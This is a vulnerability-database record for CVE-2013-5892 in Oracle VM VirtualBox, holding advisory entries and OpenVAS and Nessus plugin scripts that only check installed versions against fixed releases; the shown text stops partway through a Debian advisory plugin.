{"id": "OPENVAS:1361412562310804194", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "published": "2014-01-23T00:00:00", "modified": "2020-05-12T00:00:00", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804194", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/56490", "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html"], "cvelist": ["CVE-2013-5892"], "lastseen": "2020-05-15T17:26:36", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2878-1:66F21"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5892"]}, {"type": "freebsd", "idList": ["81F1FDC2-7EC7-11E3-A6C6-00163E1ED244"]}, {"type": "gentoo", "idList": ["GLSA-201401-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2878.NASL", "FREEBSD_PKG_81F1FDC27EC711E3A6C600163E1ED244.NASL", "GENTOO_GLSA-201401-13.NASL", "VIRTUALBOX_4_3_6.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121110", "OPENVAS:1361412562310702878", "OPENVAS:1361412562310804192", "OPENVAS:1361412562310804193", "OPENVAS:702878"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2014-1972949"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30292", "SECURITYVULNS:VULN:13537"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5892"]}], "rev": 4}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-5892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2878-1:66F21"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5892"]}, {"type": "freebsd", "idList": ["81F1FDC2-7EC7-11E3-A6C6-00163E1ED244"]}, {"type": "gentoo", "idList": 
["GLSA-201401-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2878.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:702878"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2014-1972949"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13537"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5892"]}]}, "exploitation": null, "vulnersScore": 4.1}, "pluginID": "1361412562310804194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804194\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:45:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the references advisory.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", 
value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "General", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"cve": [{"lastseen": "2022-03-23T14:19:36", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {}, "published": "2014-01-15T16:08:00", "type": "cve", "title": "CVE-2013-5892", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:oracle:vm_virtualbox:4.1.14", "cpe:/a:oracle:vm_virtualbox:4.1.4", "cpe:/a:oracle:vm_virtualbox:3.2.16", "cpe:/a:oracle:vm_virtualbox:4.2.0", "cpe:/a:oracle:vm_virtualbox:4.2.10", "cpe:/a:oracle:vm_virtualbox:4.0.12", "cpe:/a:oracle:vm_virtualbox:4.0.8", "cpe:/a:oracle:vm_virtualbox:4.2.8", "cpe:/a:oracle:vm_virtualbox:4.3.0", "cpe:/a:oracle:vm_virtualbox:3.2.0", "cpe:/a:oracle:vm_virtualbox:4.0.20", "cpe:/a:oracle:vm_virtualbox:4.3.2", "cpe:/a:oracle:vm_virtualbox:4.2.20", "cpe:/a:oracle:vm_virtualbox:4.2.18", "cpe:/a:oracle:vm_virtualbox:4.0.4", "cpe:/a:oracle:vm_virtualbox:3.2.10", "cpe:/a:oracle:vm_virtualbox:4.2.12", "cpe:/a:oracle:vm_virtualbox:4.2.16", "cpe:/a:oracle:vm_virtualbox:4.2.4", "cpe:/a:oracle:vm_virtualbox:4.1.2", "cpe:/a:oracle:vm_virtualbox:3.2.4", "cpe:/a:oracle:vm_virtualbox:4.0.0", "cpe:/a:oracle:vm_virtualbox:3.2.12", "cpe:/a:oracle:vm_virtualbox:4.1.8", "cpe:/a:oracle:vm_virtualbox:4.1.24", "cpe:/a:oracle:vm_virtualbox:4.1.28", 
"cpe:/a:oracle:vm_virtualbox:4.2.2", "cpe:/a:oracle:vm_virtualbox:4.0", "cpe:/a:oracle:vm_virtualbox:4.1.6", "cpe:/a:oracle:vm_virtualbox:4.1.12", "cpe:/a:oracle:vm_virtualbox:4.0.10", "cpe:/a:oracle:vm_virtualbox:4.0.6", "cpe:/a:oracle:vm_virtualbox:3.2.18", "cpe:/a:oracle:vm_virtualbox:4.2.14", "cpe:/a:oracle:vm_virtualbox:3.2.6", "cpe:/a:oracle:vm_virtualbox:4.0.2", "cpe:/a:oracle:vm_virtualbox:4.1.26", "cpe:/a:oracle:vm_virtualbox:4.1.0", "cpe:/a:oracle:vm_virtualbox:4.0.14", "cpe:/a:oracle:vm_virtualbox:4.1.22", "cpe:/a:oracle:vm_virtualbox:4.1.10", "cpe:/a:oracle:vm_virtualbox:3.2.8", "cpe:/a:oracle:vm_virtualbox:4.0.16", "cpe:/a:oracle:vm_virtualbox:4.3.4", "cpe:/a:oracle:vm_virtualbox:3.2.2", "cpe:/a:oracle:vm_virtualbox:4.0.18", "cpe:/a:oracle:vm_virtualbox:4.2.6", "cpe:/a:oracle:vm_virtualbox:4.1.20", "cpe:/a:oracle:vm_virtualbox:4.1.16", "cpe:/a:oracle:vm_virtualbox:3.2.14", "cpe:/a:oracle:vm_virtualbox:4.1.18"], "id": "CVE-2013-5892", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:vm_virtualbox:4.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:vm_virtualbox:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.22:*:*:*:*:*:*:*"]}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nOracle 
reports:\n\nUnspecified vulnerability in the Oracle VM VirtualBox\n\t component in Oracle Virtualization VirtualBox prior to\n\t 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local\n\t users to affect confidentiality, integrity, and availability\n\t via unknown vectors related to Core.\n\n\n", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "freebsd", "title": "virtualbox-ose -- local vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T00:00:00", "id": "81F1FDC2-7EC7-11E3-A6C6-00163E1ED244", "href": "https://vuxml.freebsd.org/freebsd/81f1fdc2-7ec7-11e3-a6c6-00163e1ed244.html", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:52:26", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle\nVirtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and\n4.3.6 allows local users to affect confidentiality, integrity, and\navailability via unknown vectors related to Core.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=735410>\n * <https://bugs.launchpad.net/ubuntu/precise/+source/virtualbox/+bug/1307725>\n", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5892", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T00:00:00", "id": "UB:CVE-2013-5892", "href": "https://ubuntu.com/security/CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:51:33", "description": "Oracle reports :\n\nUnspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-17T00:00:00", "type": "nessus", "title": "FreeBSD : virtualbox-ose -- local vulnerability (81f1fdc2-7ec7-11e3-a6c6-00163e1ed244)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:virtualbox-ose", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_81F1FDC27EC711E3A6C600163E1ED244.NASL", "href": "https://www.tenable.com/plugins/nessus/72002", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72002);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5892\");\n\n script_name(english:\"FreeBSD : virtualbox-ose -- local vulnerability (81f1fdc2-7ec7-11e3-a6c6-00163e1ed244)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Oracle reports :\n\nUnspecified vulnerability in the Oracle VM VirtualBox component in\nOracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30,\n4.2.22, and 4.3.6 allows local users to affect 
confidentiality,\nintegrity, and availability via unknown vectors related to Core.\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17c46362\"\n );\n # https://vuxml.freebsd.org/freebsd/81f1fdc2-7ec7-11e3-a6c6-00163e1ed244.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc52d82b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:virtualbox-ose\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"virtualbox-ose<4.2.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:34", "description": "The remote host contains a version of Oracle VM VirtualBox prior to 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6. 
It is, therefore, potentially affected by an unspecified, local security vulnerability related to a flaw in the 'Core' subcomponent.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-17T00:00:00", "type": "nessus", "title": "Oracle VM VirtualBox < 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6 Local Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:oracle:vm_virtualbox"], "id": "VIRTUALBOX_4_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/72008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(72008);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n\n script_name(english:\"Oracle VM VirtualBox < 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6 Local Vulnerability\");\n script_summary(english:\"Does a version check on VirtualBox.exe\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has an application that is affected by an unspecified,\nlocal security vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host contains a version of Oracle VM VirtualBox prior to\n3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6. 
It is, therefore,\npotentially affected by an unspecified, local security vulnerability\nrelated to a flaw in the 'Core' subcomponent.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530945/30/0/threaded\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Oracle VM VirtualBox to 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 /\n4.3.6 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"virtualbox_installed.nasl\");\n script_require_keys(\"VirtualBox/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('VirtualBox/Version');\npath = get_kb_item_or_exit('SMB/VirtualBox/'+ver);\n\nver_fields = split(ver, sep:'.', keep:FALSE);\nmajor = int(ver_fields[0]);\nminor = int(ver_fields[1]);\nrev = int(ver_fields[2]);\n\nif (major == 3 && minor == 2 && rev < 
20) fix = '3.2.20';\nelse if (major == 4 && minor == 0 && rev < 22) fix = '4.0.22';\nelse if (major == 4 && minor == 1 && rev < 30) fix = '4.1.30';\nelse if (major == 4 && minor == 2 && rev < 22) fix = '4.2.22';\nelse if (major == 4 && minor == 3 && rev < 6) fix = '4.3.6';\n\nif (fix)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Oracle VM VirtualBox', ver, path);\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86 virtualisation solution, resulting in denial of service, privilege escalation and an information leak.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-14T00:00:00", "type": "nessus", "title": "Debian DSA-2878-1 : virtualbox - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:virtualbox", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2878.NASL", "href": "https://www.tenable.com/plugins/nessus/72993", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2878. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72993);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_bugtraq_id(64905, 64909, 64911, 64913);\n script_xref(name:\"DSA\", value:\"2878\");\n\n script_name(english:\"Debian DSA-2878-1 : virtualbox - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 